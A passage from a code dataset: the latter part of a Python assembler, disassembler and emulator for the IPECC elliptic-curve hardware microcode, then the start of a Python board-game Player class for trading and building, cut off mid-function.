ipecc_instructions_dict[instruction][0][opn] == ipecc_flag():\n # Extract our flag\n current_encoding += ((FLAGS_BITS_SIZE - 5) * \"0\") + ipecc_flags_dict[OPERANDS[num_op]]\n ABSTRACT_OPERANDS[real_num_op] = (\"FLAG\", OPERANDS[num_op], binstring_to_int(ipecc_flags_dict[OPERANDS[num_op]]))\n # Update the abstract representation\n real_num_op += 1\n num_op += 1\n # Do we have a constant?\n elif ipecc_instructions_dict[instruction][0][opn] == ipecc_const():\n constant = int(OPERANDS[num_op])\n if constant > 2**CONSTANTS_BITS_SIZE:\n print_error(\"Syntax error line %d: \" % line_num, l, \", constant %d exceeds the %d bits size\" % (constant, CONSTANTS_BITS_SIZE))\n sys.exit(-1)\n # Put it in the LSB of the operand field\n current_encoding += ((OPERANDS_BITS_SIZE - CONSTANTS_BITS_SIZE) * \"0\") + int_to_binstring(constant, CONSTANTS_BITS_SIZE)\n # Update the abstract representation\n ABSTRACT_OPERANDS[real_num_op] = (\"CONST\", None, constant)\n real_num_op += 1\n num_op += 1\n # Else we have a regular operand\n else:\n # The \"patchme\" operand is automatically handled here\n current_encoding += ((OPERANDS_BITS_SIZE - 5) * \"0\") + ipecc_operands_dict[OPERANDS[num_op]]\n # Update the abstract representation\n ABSTRACT_OPERANDS[real_num_op] = (\"OP\", OPERANDS[num_op], binstring_to_int(ipecc_operands_dict[OPERANDS[num_op]]))\n num_op += 1\n real_num_op += 1\n elif ipecc_instructions_dict[instruction][1] == \"BRANCH\":\n # Our branch instructions must have at most one operand\n if len(OPERANDS) > 1:\n print_error(\"Syntax error line %d: \" % line_num, l, \", operands number %d > 1 for BRANCH instruction\" % (len(OPERANDS)))\n sys.exit(-1)\n # Extract the immediate\n if len(OPERANDS) == 1:\n label = OPERANDS[0]\n immediate = ipecc_labels_dict[label+\":\"][0]\n current_encoding += (((3 * OPERANDS_BITS_SIZE) - IMMEDIATE_BITS_SIZE) * \"0\") + immediate\n # Update the abstract representation\n ABSTRACT_OPERANDS[0] = (\"IMM\", label, binstring_to_int(immediate))\n else:\n current_encoding += (3 * OPERANDS_BITS_SIZE) * \"0\"\n else:\n print_error(\"Syntax error line %d: \" % line_num, l, \", unkown instruction type %s\" % (ipecc_instructions_dict[instruction][1]))\n sys.exit(-1)\n ##########\n # Sanity checks on the result\n if len(current_encoding) != (5 + OPCODE_CLASS_BITS_SIZE + OPCODE_BITS_SIZE + PATCH_BITS_SIZE + (3 * OPERANDS_BITS_SIZE)):\n print_error(\"Syntax error line %d: \" % line_num, l, \", internal error: encoding is %d instead of %d\" % (len(current_encoding), (5 + OPCODE_CLASS_BITS_SIZE + OPCODE_BITS_SIZE + PATCH_BITS_SIZE + (3 * OPERANDS_BITS_SIZE))))\n sys.exit(-1)\n encoding += current_encoding + \"\\n\"\n ### Add the abstract representation\n abstract_asm_representation.append((current_addr, instruction, OPTIONS, ABSTRACT_OPERANDS, l))\n if ipecc_instructions_dict[instruction][1] != \"PSEUDO\":\n current_addr += 1\n line_num += 1\n # Remove our trailing 'S'\n if 'S' in encoding:\n encoding = encoding.replace('S', '0')\n return (encoding, abstract_asm_representation)\n\ndef assemble_file(infile):\n with open(infile, \"r\") as f:\n asm = f.read()\n # First pass to resolve the labels\n resolve_labels(asm)\n print(\" -> First pass for labels resolution done\")\n # Second pass for encoding opcodes\n (encoding, abstract_asm) = encode_opcodes(asm)\n print(\" -> Second pass for opcode encoding done\")\n # Now format our assembly output\n output = \"\"\n lines = encoding.splitlines()\n line_num = 1\n address = 0\n addr_digits_10 = str(len(str(len(lines))))\n addr_digits_x = str(len(str(hex(len(lines)))) - 2) # -2 to account for initial \"0x\" added by str on an hex\n for l in lines:\n if len(l) % 8 == 0:\n form = str(2*(len(l) // 8))\n else:\n form = str(2*((len(l) // 8) + 1))\n output += (\"\\t\\t\\\"%s\\\", -- 0x%0\"+addr_digits_x+\"x (%0\"+addr_digits_10+\"d)\\t\\t\\t(0x%0\"+form+\"x)\") % (l, address // len(l), address // len(l), binstring_to_int(l))\n if line_num != len(lines):\n output += \"\\n\"\n line_num += 1\n address += len(l)\n output = ecc_curve_iram_begin + output + ecc_curve_iram_end\n outfile = os.path.splitext(infile)[0] + \".vhd\"\n with open(outfile, \"w\") as f:\n f.write(output)\n print_progress(\"[+] Assembling file %s done in %s\" % (infile, outfile))\n # Export our symbols in ecc_addr.vhd\n output = \"\"\n output_h = \"\"\n for k in ipecc_labels_dict.keys():\n # If the label is suffixed with \"L_export\", we have\n # to export it\n check = re.search(r\"L_export:\", k)\n if check is not None:\n k_ = k.replace(r\"L_export:\", \"\")[1:]\n output += \"\\tconstant ECC_IRAM_\"+k_.upper()+\"_ADDR : std_logic_vector(IRAM_ADDR_SZ - 1 downto 0) := \"\n output += (\"\\\"\"+ipecc_labels_dict[k][0]+\"\\\"; -- %s\\n\") % ipecc_labels_dict[k][1]\n output_h += (\"#define ECC_IRAM_\"+k_.upper()+\"_ADDR %s\\n\") % ipecc_labels_dict[k][1]\n output = ecc_addr_begin + output + ecc_addr_end\n output_h += ecc_addr_h_middle\n for k in ipecc_labels_dict.keys():\n # If the label is suffixed with \"L_dbg\", we have\n # to export it also to the C header output file\n check = re.search(r\"L_dbg:\", k)\n if check is not None:\n k_ = k.replace(r\"L_dbg:\", \"\")[1:]\n output_h += (\"#define DEBUG_ECC_IRAM_\"+k_.upper()+\"_ADDR %s\\n\") % ipecc_labels_dict[k][1]\n output_h = ecc_addr_h_begin + output_h + ecc_addr_h_end\n #outfile = os.path.splitext(infile)[0] + \"_addr.vhd\"\n outfile = \"ecc_addr.vhd\"\n outfile_h = \"ecc_addr.h\"\n with open(outfile, \"w\") as f:\n f.write(output)\n with open(outfile_h, \"w\") as f:\n f.write(output_h)\n print_progress(\"[+] Exported VHDL addresses of %s done in %s (C header: %s)\" % (infile, outfile, outfile_h))\n\ndef get_dec_hexa_bin_value(inval):\n try:\n val = int(inval)\n except:\n val = inval \n if val[1] == 'x':\n val = int(inval, 16)\n else:\n val = int(inval, 2)\n return val\n \ndef emulate_file(infile, initial_state):\n # First, interpret our initial state\n initial_state = initial_state.splitlines()\n line_num = 1\n ip = lrip = breakip = verbosity = None\n flags = []\n registers = []\n print(\" -> Parsing stding for options\")\n for l in initial_state:\n # Skip empty lines and comments\n comment = re.search(r\"^\\s*#\", l)\n empty_line = re.search(r\"^\\s*$\", l)\n if (comment is not None) or (empty_line is not None):\n line_num += 1\n continue\n check = re.search(r\"^\\s*(\"+ipecc_operand()+\"|\"+ipecc_flag()+\"|\"+ipecc_internal_flag()+\"|mem\\[([0-9]+|0x[0-9a-fA-F]+|0b[0-1]+)\\]|ip|lrip|breakip|verbose)\\s*=\\s*([0-9]+|0x[0-9a-fA-F]+|0b[0-1]+)\\s*(#.*)*$\", l)\n if check is None:\n print_error(\"Error line %d: \" % line_num, \"%s syntax error\" % l, \" unknown token\")\n sys.exit(-1)\n ## Find our initial state, this consists of\n ## Getting registers values and flags\n check = re.search(r\"^\\s*(\"+ipecc_operand()+\")\\s*=\\s*([0-9]+|0x[0-9a-fA-F]+|0b[0-1]+)\\s*(#.*)*$\", l)\n if check is not None:\n reg = check.group(1)\n val = get_dec_hexa_bin_value(check.group(2))\n if val >= 2**BIGNUM_BITS_SIZE:\n print_error(\"Error line %d: \" % line_num, \"%s: register %s has bad value\" % (l, reg), \" %d exceeds bignum size %d\" % (val, BIGNUM_BITS_SIZE))\n sys.exit(-1)\n registers.append((binstring_to_int(ipecc_operands_dict[reg]), val))\n check = re.search(r\"^\\s*(\"+ipecc_flag()+\"|\"+ipecc_internal_flag()+\")\\s*=\\s*([0-9]+|0x[0-9a-fA-F]+|0b[0-1]+)\\s*(#.*)*$\", l)\n if check is not None:\n flag = check.group(1)\n val = get_dec_hexa_bin_value(check.group(2))\n flags.append((flag, val))\n if (val != 0) and (val != 1):\n print_error(\"Error line %d: \" % line_num, \"%s: flag %s has bad value\" % (l, flag), \" only 0/1 binary value is allowed\")\n sys.exit(-1)\n ## Getting possible ip, lrip, breakip\n check = re.search(r\"^\\s*(ip|lrip|breakip)\\s*=\\s*([0-9]+|0x[0-9a-fA-F]+|0b[0-1]+)\\s*(#.*)*$\", l)\n if check is not None:\n val = get_dec_hexa_bin_value(check.group(2))\n if val >= 2**IMMEDIATE_BITS_SIZE:\n print_error(\"Error line %d: \" % line_num, \"%s: %s has bad value\" % (l, check.group(1)), \" %d exceeds instruction bus width (%d bits)\" % (val, IMMEDIATE_BITS_SIZE))\n sys.exit(-1)\n if check.group(1) == \"ip\":\n ip = val\n elif check.group(1) == \"lrip\":\n lrip = val\n elif check.group(1) == \"breakip\":\n breakip = val\n else:\n print_error(\"Error line %d: \" % line_num, \"%s syntax error\" % l, \" unknown token\")\n sys.exit(-1)\n ## Getting verbosity\n check = re.search(r\"^\\s*(verbose)\\s*=\\s*([0-9]+|0x[0-9a-fA-F]+|0b[0-1]+)\\s*(#.*)*$\", l)\n if check is not None:\n verbosity = get_dec_hexa_bin_value(check.group(2))\n ## Initialize our context with proper values\n context = IPECCExecutionContext(registers, flags, ip, lrip)\n with open(infile, \"r\") as f:\n asm = f.read()\n # First pass to resolve the labels\n resolve_labels(asm)\n print(\" -> First pass for labels resolution done\")\n # Second pass for encoding opcodes\n (encoding, abstract_asm) = encode_opcodes(asm)\n print(\" -> Second pass for opcode encoding done\")\n # First, check if the asked address for ip and rip and breakip are indeed in our\n # range and classify our opcodes in an address base dictionnary\n abstract_asm_dict = {}\n for ins in abstract_asm: \n (current_addr, instruction, OPTIONS, ABSTRACT_OPERANDS, l) = ins\n if current_addr not in abstract_asm_dict.keys():\n abstract_asm_dict[current_addr] = [ ins ]\n else:\n abstract_asm_dict[current_addr].append(ins)\n if (ip is not None):\n if ip not in abstract_asm_dict.keys():\n print_error(\"Error: \", \"bad ip value %d\" % ip, \" ip not in allowed range for the program\")\n sys.exit(-1)\n context.ip = ip\n else:\n context.ip = 0\n if (lrip is not None):\n if lrip not in abstract_asm_dict.keys():\n print_error(\"Error: \", \"bad lrip value %d\" % ip, \" lrip not in allowed range for the program\")\n sys.exit(-1)\n context.lrip = lrip\n if (breakip is not None):\n if breakip not in abstract_asm_dict.keys():\n print_error(\"Error: \", \"bad breakip value %d\" % ip, \" breakip not in allowed range for the program\")\n sys.exit(-1)\n context.breakip = breakip\n # Our execution loop\n stop = False\n while True:\n # Execute in a loop\n all_ins_at_ip = abstract_asm_dict[context.ip]\n for ins in all_ins_at_ip:\n (current_addr, instruction, OPTIONS, ABSTRACT_OPERANDS, l) = ins\n # Get the routine to execute\n emulation_routine = ipecc_instructions_dict[instruction][4]\n context = emulation_routine(ins, context)\n if verbosity is not None:\n print(context)\n # Do we have to stop ?\n if instruction == \"STOP\":\n print_info(\"Hitting STOP\", \"\")\n stop = True\n break\n if context.ip == breakip:\n stop = True\n print_info(\"Hitting breakip: \", \"breakip = %d\" % breakip)\n break\n if stop is True:\n break\n print(context)\n return\n\n##########################################################\ndef disassemble(binary):\n lines = binary.splitlines()\n line_num = 1\n # Compute our instructions size\n instructions_size = (5 + OPCODE_CLASS_BITS_SIZE + OPCODE_BITS_SIZE + PATCH_BITS_SIZE + (3 * OPERANDS_BITS_SIZE))\n disass_output = []\n instructions_num = 0\n jump_targets = []\n for l in lines:\n local_disass_output = \"\"\n bitstring = l\n if len(bitstring) != instructions_size:\n print_error(\"Error line %d: \" % line_num, \"\", \"instruction size %d != %d mismatch\" % (len(bitstring), instructions_size))\n sys.exit(-1)\n # We have our instruction, split it\n pos = 0\n stop = bitstring[pos]\n pos += 1\n barrier = bitstring[pos]\n pos += 1\n instruction_type = bitstring[pos:pos+OPCODE_CLASS_BITS_SIZE]\n pos += OPCODE_CLASS_BITS_SIZE\n instruction_opcode = bitstring[pos:pos+OPCODE_BITS_SIZE]\n pos += OPCODE_BITS_SIZE\n X = bitstring[pos]\n pos += 1\n is_patch = bitstring[pos]\n pos += 1\n patch = bitstring[pos:pos+PATCH_BITS_SIZE]\n pos += PATCH_BITS_SIZE\n M = bitstring[pos]\n pos += 1\n opa = bitstring[pos:pos+OPERANDS_BITS_SIZE]\n pos += OPERANDS_BITS_SIZE\n opb = bitstring[pos:pos+OPERANDS_BITS_SIZE]\n pos += OPERANDS_BITS_SIZE\n opc = bitstring[pos:pos+OPERANDS_BITS_SIZE]\n pos += OPERANDS_BITS_SIZE\n # First we get the instruction type\n # Then the instruction\n found_ins = None\n for ins in ipecc_instructions_dict.keys():\n t = ipecc_instructions_dict[ins][1]\n if t == \"PSEUDO\" or t == \"ALIAS\":\n continue\n tt = ipecc_instructions_types_dict[t]\n e = ipecc_instructions_dict[ins][2]\n if (tt == instruction_type) and (e == instruction_opcode):\n found_ins = ins\n break\n if found_ins is None:\n print_error(\"Error line %d: %s: \" % (line_num, l), \"\", \"impossible to disassemble type %s / ins %s (unknown instruction)\" % (instruction_type, instruction_opcode))\n sys.exit(-1)\n # Get our semantics\n sem = ipecc_instructions_dict[found_ins][0]\n # Format our operands\n op_num = 0\n op_string = \"\"\n allops = [opa, opb, opc]\n for op in sem:\n if op == ipecc_operand():\n op_string += \"disass_r\"+str(binstring_to_int(allops[op_num]))\n if op == ipecc_const():\n op_string += (\" \"*8)+str(binstring_to_int(allops[op_num]))\n if op == ipecc_flag():\n found_flag = None\n for flag in ipecc_flags_dict.keys():\n if ipecc_flags_dict[flag] == allops[op_num]:\n found_flag = flag\n op_string += flag\n if found_flag is None:\n print_error(\"Error line %d: \" % (line_num), l, \", flag %s is not known\" % (allops[op_num]))\n sys.exit(-1)\n if (op is None) and (t == \"BRANCH\"):\n op_string += \".Label\"+str(binstring_to_int(opa+opb+opc))+\"L\"\n # Save all our branches\n jump_targets.append(binstring_to_int(opa+opb+opc))\n if (op is None) and (t != \"BRANCH\"):\n op_string += \"\\t\"\n op_string += \"\\t\"\n op_num += 1\n # Format the output\n local_disass_output += \"\\t\\t\"+found_ins\n # Handle the X and M bits\n if M == \"1\":\n local_disass_output += \",M\"\n if X == \"1\":\n local_disass_output += \",X\"\n if is_patch == \"1\":\n local_disass_output += \",p\"+str(binstring_to_int(patch))\n local_disass_output += (20-len(local_disass_output))*\" \"\n local_disass_output += \"\\t\"+op_string\n # Formatting\n if t == \"BRANCH\":\n local_disass_output += \"\\t\"*4 \n if t == \"NOP\":\n local_disass_output += \"\\t\"*6\n if barrier == \"1\":\n disass_output.append((None, \"\\t\\tBARRIER\"))\n disass_output.append((instructions_num, local_disass_output))\n if stop == \"1\":\n disass_output.append((None, \"\\t\\tSTOP\"))\n instructions_num += 1\n line_num += 1\n #\n disass_output_str = \"\"\n for (addr, ins) in disass_output:\n # Is our address concerned by a jump?\n if addr in jump_targets:\n # If yes, add a previous label\n disass_output_str += (\".Label%dL:\\n\" % addr)\n disass_output_str += ins\n if addr is not None:\n disass_output_str += \"\\t\"+(\"# %d\" % addr)+\"\\n\"\n else:\n disass_output_str += \"\\n\"\n return disass_output_str\n\ndef disassemble_file(infile):\n instructions_size = (5 + OPCODE_CLASS_BITS_SIZE + OPCODE_BITS_SIZE + PATCH_BITS_SIZE + (3 * OPERANDS_BITS_SIZE))\n with open(infile, \"r\") as f:\n # Parse all the binary strings in that file\n binary = f.read()\n lines = binary.splitlines()\n line_num = 1\n binary = \"\"\n for l in lines:\n check = re.search(r\"\\\"([01]+)\\\"\", l)\n if check is not None:\n bitstring = check.group(1)\n if len(bitstring) != instructions_size:\n print_error(\"Error line %d: \" % line_num, \"\", \"instruction size %d != %d mismatch\" % (len(bitstring), instructions_size))\n sys.exit(-1)\n binary += bitstring+\"\\n\"\n line_num += 1\n # Call the raw disassembler\n disass_output = disassemble(binary)\n outfile = os.path.splitext(infile)[0] + \"_disass.s\"\n with open(outfile, \"w\") as f:\n f.write(\"\\t\\t######################################################################################\\n\")\n f.write(\"\\t\\t# Disassembly automatically generated. For this file to be compiled again, you will #\\n\")\n f.write(\"\\t\\t# have to specify the operands disass_r0, disass_r1, ... in your variables CSV file. #\\n\")\n f.write(\"\\t\\t# These registers are simply the mapped ones at incremental addresses, meaning that #\\n\")\n f.write(\"\\t\\t# you should populate your CSV file with lines like: #\\n\")\n f.write(\"\\t\\t# disass_r0,0 #\\n\")\n f.write(\"\\t\\t# disass_r1,1 #\\n\")\n f.write(\"\\t\\t# ... and so on #\\n\")\n f.write(\"\\t\\t# #\\n\")\n f.write(\"\\t\\t# Note that the assembler contains these disassembly registers by default, but if #\\n\")\n f.write(\"\\t\\t# somehow these have changed (e.g. registers size and so on), an update MUST be #\\n\")\n f.write(\"\\t\\t# provided in the variables CSV file for the assembler to properly find them. #\\n\")\n f.write(\"\\t\\t# #\\n\")\n f.write(\"\\t\\t# Also note that instructions with patches could have dummy operands: you will have #\\n\")\n f.write(\"\\t\\t# to know what the exact patch is doing to interpret the disassembly. #\\n\")\n f.write(\"\\t\\t######################################################################################\\n\")\n f.write(disass_output)\n print_progress(\"[+] Disassembly of %s written in %s\" % (infile, outfile))\n return\n\n##########################################################\n\n# Extract from VHDL the information about our constants and instructions\ndef parse_vhdl(vhdl, vhdl_conf):\n global ipecc_instructions_dict\n global ipecc_instructions_types_dict\n global OPERANDS_BITS_SIZE\n global PATCH_BITS_SIZE\n global IMMEDIATE_BITS_SIZE\n global CONSTANTS_BITS_SIZE\n global OPCODE_BITS_SIZE\n global OPCODE_CLASS_BITS_SIZE\n global BIGNUM_BITS_SIZE\n #\n lines = vhdl.splitlines()\n line_num = 1\n for l in lines:\n ## Opcode classes\n check = re.search(r\"constant\\s+OPCODE_([A-Z]+)\\s*:.*:=\\s*\\\"([01]+)\\\"\", l)\n if check is not None:\n # Extract the values\n opcode_type = check.group(1)\n val = check.group(2)\n if OPCODE_CLASS_BITS_SIZE != len(val):\n print_warning(\"Warning: \", \"%s opcode class bit length mismatches (%d != %d), updating\" % (opcode_type, OPCODE_CLASS_BITS_SIZE, len(val)))\n OPCODE_CLASS_BITS_SIZE = len(val)\n ## Opcode values\n check = re.search(r\"constant\\s+OPCODE_([A-Z]+)_([A-Z]+)\\s*:.*\\s*:=\\s*\\\"([01]+)\\\"\", l)\n if check is not None:\n # Extract the values\n opcode_type = check.group(1)\n if opcode_type == \"BRA\":\n opcode_type = \"BRANCH\"\n opcode = check.group(2)\n val = check.group(3)\n # Find it in our dictionary\n for k in ipecc_instructions_dict.keys():\n if ipecc_instructions_dict[k][1] == \"ARITH\" or ipecc_instructions_dict[k][1] == \"BRANCH\":\n if ipecc_instructions_dict[k][3] == opcode:\n if opcode_type != ipecc_instructions_dict[k][1]:\n print_warning(\"Warning: \", \"%s opcode type mismatches (%s != %s), updating\" % (opcode, opcode_type, ipecc_instructions_dict[k][1]))\n ipecc_instructions_dict[k] = (ipecc_instructions_dict[k][0], opcode_type, ipecc_instructions_dict[k][1], ipecc_instructions_dict[k][3])\n # Check the equality\n if val != ipecc_instructions_dict[k][2]:\n print_warning(\"Warning: \", \"%s opcode value mismatches (%s != %s), updating\" % (opcode, val, ipecc_instructions_dict[k][2]))\n ipecc_instructions_dict[k] = (ipecc_instructions_dict[k][0], ipecc_instructions_dict[k][1], val, ipecc_instructions_dict[k][3])\n # Sanity check\n if OPCODE_BITS_SIZE != len(val):\n print_warning(\"Warning: \", \"%s opcode bit length mismatches (%d != %d), updating\" % (opcode, OPCODE_BITS_SIZE, len(val)))\n OPCODE_BITS_SIZE = len(val)\n ## Patch size\n check = re.search(r\"OP_PATCH_SZ\\s*:\\s*integer\\s*:=\\s*([0-9]+)\", l)\n if check is not None:\n val = int(check.group(1))\n if PATCH_BITS_SIZE != val:\n print_warning(\"Warning: \", \"PATCH_BITS_SIZE mismatches (%d != %d), updating\" % (OPCODE_BITS_SIZE, val))\n PATCH_BITS_SIZE = val\n ## Branch immediate size\n # This must be equal to IRAM_ADDR_SZ\n check = re.search(r\"OP_BR_IMM_SZ\\s*:\\s*integer\\s*:=\\s*([A-Z_]+)\", l)\n if check is not None:\n val = check.group(1)\n if val != \"IRAM_ADDR_SZ\":\n print_error(\"Error: \", \"\", \"apparently OP_BR_IMM_SZ = %s, and not IRAM_ADDR_SZ in VHDL file!\" % (val))\n sys.exit(-1)\n check = re.search(r\"IRAM_ADDR_SZ\\s*:\\s*integer\\s*:=\\s*([0-9]+)\", l)\n ## Constants operand size\n check = re.search(r\"OP_SHREG_IMM_SZ\\s*:\\s*positive\\s*:=\\s*([0-9]+)\", l)\n if check is not None:\n val = int(check.group(1))\n if val != CONSTANTS_BITS_SIZE:\n print_warning(\"Warning: \", \"CONSTANTS_BITS_SIZE mismatches (%d != %d), updating\" % (CONSTANTS_BITS_SIZE, val))\n CONSTANTS_BITS_SIZE = val\n line_num += 1\n # Handle the operand and bignum size in the configuration package\n lines = vhdl_conf.splitlines()\n line_num = 1\n nblargenb = nbopcodes = None\n for l in lines:\n ## Operand size\n check = re.search(r\"constant\\s+nblargenb\\s*:\\s*positive\\s*:=\\s*([0-9]+)\", l)\n if check is not None:\n nblargenb = int(check.group(1))\n ## Opcode size\n check = re.search(r\"constant\\s+nbopcodes\\s*:\\s*positive\\s*:=\\s*([0-9]+)\", l)\n if check is not None:\n nbopcodes = int(check.group(1))\n ## Bignum size\n check = re.search(r\"constant\\s+nn\\s*:\\s*positive\\s*:=\\s*([0-9]+)\", l)\n if check is not None:\n nnsize = int(check.group(1))\n if BIGNUM_BITS_SIZE != nnsize:\n print_warning(\"Warning: \", \"BIGNUM_BITS_SIZE mismatches (%d != %d), updating\" % (BIGNUM_BITS_SIZE, nnsize))\n BIGNUM_BITS_SIZE = nnsize\n line_num += 1\n if (nbopcodes is None) or (nblargenb is None):\n print_error(\"Error: \", \"\", \"cannot find nbopcodes or nblargenb in the VHDL conf file\")\n sys.exit(-1)\n # The operand size is log2(nblargenb)\n if 2**int(math.log2(nblargenb)) != nblargenb:\n print_error(\"Error: \", \"\", \"nblargenb = %d is weird ... (not a power of 2)\" % nblargenb)\n sys.exit(-1)\n if 2**OPERANDS_BITS_SIZE != nblargenb:\n opsize = int(math.log2(nblargenb))\n print_warning(\"Warning: \", \"OPERANDS_BITS_SIZE mismatches (%d != %d), updating\" % (OPERANDS_BITS_SIZE, opsize))\n OPERANDS_BITS_SIZE = opsize\n # The immediate branch size should be log2(nbopcodes)\n if 2**int(math.log2(nbopcodes)) != nbopcodes:\n print_error(\"Error: \", \"\", \"nbopcodes = %d is weird ... (not a power of 2)\" % nbopcodes)\n sys.exit(-1)\n if 2**IMMEDIATE_BITS_SIZE != nbopcodes:\n immsize = int(math.log2(nbopcodes))\n print_warning(\"Warning: \", \"IMMEDIATE_BITS_SIZE and nbopcodes mismatch (%d != %d), updating\" % (IMMEDIATE_BITS_SIZE, immsize))\n IMMEDIATE_BITS_SIZE = immsize\n print_progress(\"[+] Parsing of VHDL files done, everything OK\")\n\n\n# Extract from CSV the information about our operand variables mapping\ndef parse_csv(csv):\n lines = csv.splitlines()\n line_num = 1\n for l in lines:\n # Skip comments and empty lines\n comment = re.search(r\"^\\s*#\", l)\n empty_line = re.search(r\"^\\s*$\", l)\n if (comment is None) and (empty_line is None):\n check = re.search(r\"([a-zA-Z0-9_]+),([0-9]+)\", l)\n if check is not None:\n op = check.group(1)\n val = int(check.group(2))\n # Check if the operand is in our dictionary and if\n # its address is consistent\n if op in ipecc_operands_dict.keys():\n addr = ipecc_operands_dict[op]\n if int_to_binstring(val, OPERANDS_BITS_SIZE) != addr:\n print_warning(\"Warning: \", \"operand %s from CSV address differs (\\\"%s\\\" (@%d) != \\\"%s\\\" (@%d)), fixing it\" % (op, int_to_binstring(val, OPERANDS_BITS_SIZE), val, addr, binstring_to_int(addr)))\n ipecc_operands_dict[op] = int_to_binstring(val, OPERANDS_BITS_SIZE)\n else:\n print_warning(\"Warning: \", \"operand %s (@%d, \\\"%s\\\") from CSV missing and added\" % (op, val, int_to_binstring(val, OPERANDS_BITS_SIZE)))\n ipecc_operands_dict[op] = int_to_binstring(val, OPERANDS_BITS_SIZE)\n line_num += 1\n # Refresh our instructions dict with new operands regexps\n ipecc_instructions_dict_refresh_operands()\n print_progress(\"[+] Parsing of CSV done, everything OK\")\n\n\n## Sanity check and update our dictionaries if asked\nif len(sys.argv) > 3:\n if len(sys.argv) != 6:\n print_error(\"Error: \", \"\", \"expecting -a, -d, or -e the VHDL file as arg3, the VHDL conf as arg4 and the CSV file as arg5!\")\n sys.exit(-1)\n print(\" -> Parsing %s, %s and %s for checking/updating our constants\" % (sys.argv[3], sys.argv[4], sys.argv[5]))\n with open(sys.argv[3], \"r\") as f1, open(sys.argv[4], \"r\") as f2 :\n vhdl1 = f1.read()\n vhdl2 = f2.read()\n parse_vhdl(vhdl1, vhdl2)\n with open(sys.argv[5], \"r\") as f:\n csv = f.read()\n parse_csv(csv)\n\nif len(sys.argv) < 3:\n print_error(\"Error: \", \"\", \"expecting -a (assemble) or -d (disassemble) or -e (execute) with at least the file\")\n sys.exit(-1)\n\nif sys.argv[1] == \"-a\":\n ## Assembly\n print(\" -> Assembling file %s\" % sys.argv[2])\n assemble_file(sys.argv[2])\nelif sys.argv[1] == \"-d\":\n ## Disassembly\n print(\" -> Disassembling file %s\" % sys.argv[2])\n disassemble_file(sys.argv[2])\nelif sys.argv[1] == \"-e\":\n ## Emulation\n # Read stdin\n print(\" -> Reading initial state from stdin ...\")\n initial_state = sys.stdin.read()\n print(\" -> Emulation of file %s\" % sys.argv[2])\n emulate_file(sys.argv[2], initial_state)\nelse:\n print_error(\"Error: \", \"\", \"unknown option '%s' (-a, -d or -e expected)\" % sys.argv[1])\n sys.exit(-1)\n","repo_name":"ANSSI-FR/IPECC","sub_path":"hdl/common/ecc_curve_iram/ipecc_assembler.py","file_name":"ipecc_assembler.py","file_ext":"py","file_size_in_byte":77648,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"40843233607","text":"import random\nfrom copy import copy\n\nclass Player:\n def __init__(self, player_id):\n self.player_id = player_id\n self.market = {} # {item: price}\n self.inventory = {} # {item: amount}\n self.merchant_pos = \"Home\"\n self.money = 50\n self.victory_points = 0\n self.buildings = []\n self.building_card_hand = []\n\n # bookeeping history\n self.player_inventory_history = list()\n self.player_money_history = list()\n \n def log(self, log_string):\n print(\"Player {}: {}\".format(self.player_id, log_string))\n \n def buy(self, item, amount, other_player):\n \n cost = other_player.market[item]*amount\n \n if amount > other_player.inventory[item]:\n raise Exception(\"Tried to buy {} {} items, but only {} available\".format(amount,item,other_player.inventory[item]))\n \n if self.money < cost:\n raise Exception(\"Tried to buy {} {} items. Not enough money: {} < {}\".format(amount, item,self.money,cost))\n \n # make transaction\n self.money -= cost\n other_player.money += cost\n other_player.inventory[item] -= amount\n self.inventory[item] += amount\n self.log(\"Buying: {} {}'s for {} from player {}, {}$ left\".format(amount, item, cost, other_player.player_id, self.money))\n \n \n def set_player_refs(self, other_players_ref, building_deck_ref):\n # get latest info about other player\n self.other_players_ref = other_players_ref\n self.building_deck_ref = building_deck_ref\n\n def init_inventory(self,start_inventory,building_deck):\n # init inventory\n all_resources = building_deck.all_resource_list\n self.inventory = dict()\n for item in all_resources:\n self.inventory[item] = 0\n for key, value in start_inventory.items():\n self.inventory[key] = value\n\n\n def draw_start_cards(self, building_deck):\n for i in range(5):\n card = building_deck.draw_card()\n self.building_card_hand.append(card)\n\n def adjust_market(self):\n self.log(\"ADJUST MARKET\")\n # Player adjusts market price of its inventory items\n self.market = {}\n for item, amount in self.inventory.items():\n if amount > 0:\n price = random.randint(5, 20)\n self.market[item] = price\n self.log({x:\"{} / {}$\".format(self.inventory[x],y) for x,y in self.market.items()})\n\n \n\n\n def trade(self):\n self.log(\"TRADE\")\n # Player select a fellow merchant player to trade with\n fellow_merchant = random.choice(self.other_players_ref)\n self.log(\"Choosing player {} to trade with\".format(fellow_merchant.player_id))\n\n can_afford_items = [x for x,y in fellow_merchant.market.items() if y <= self.money]\n if len(can_afford_items) > 0:\n item = random.choice(can_afford_items)\n price = fellow_merchant.market[item]\n max_amount = self.money // price\n max_amount = min(max_amount,fellow_merchant.inventory[item])\n if max_amount > 1:\n amount = random.randint(1, max_amount)\n self.buy(item, amount, fellow_merchant) \n \n return None\n\n def build(self):\n self.log(\"BUILD\")\n # build building action\n \n can_build_buildings = [(i,x) for i, x in enumerate(self.building_card_hand) if x.can_build(self.inventory)]\n if len(can_build_buildings) > 0:\n to_build_choice = random.choice(can_build_buildings)\n to_build_idx = to_build_choice[0]\n to_build = to_build_choice[1]\n \n # pay building cost\n for item, cost in to_build.cost.items():\n self.inventory[item] -= cost\n self.log(\"building {} at cost {} \".format(to_build.name,to_build.cost))\n # build\n self.buildings.append(to_build)\n self.building_card_hand.pop(to_build_idx)\n else:\n self.log(\"Cant build any of {}\".format([x.name for x in self.building_card_hand]))\n # change building card action\n if len(self.building_card_hand) > 0: \n to_change_idx = random.randint(0,len(self.building_card_hand)-1)\n discard_card = self.building_card_hand[to_change_idx]\n self.building_card_hand.pop(to_change_idx)\n self.building_deck_ref.discard_card(discard_card)\n\n # TODO discard pile\n\n # draw cards to fill hand\n while len(self.building_card_hand) < 5:\n card = self.building_deck_ref.draw_card()\n self.building_card_hand.append(card)\n\n return None\n\n def collect(self):\n self.log(\"COLLECT\")\n\n # collect resources\n for building in self.buildings:\n\n # choose among production options\n can_afford_options = []\n for production_option in building.production:\n can_afford = True\n for item_name, item_amount in production_option[\"cost\"].items():\n if self.inventory[item_name] - item_amount < 0: \n can_afford = False\n if can_afford:\n can_afford_options.append(production_option)\n\n if len(can_afford_options) > 0:\n # select what to produce\n production_option = random.choice(can_afford_options)\n\n # pay production cost\n for item_name, item_amount in production_option[\"cost\"].items():\n self.inventory[item_name] -= item_amount\n\n # get produced items\n for 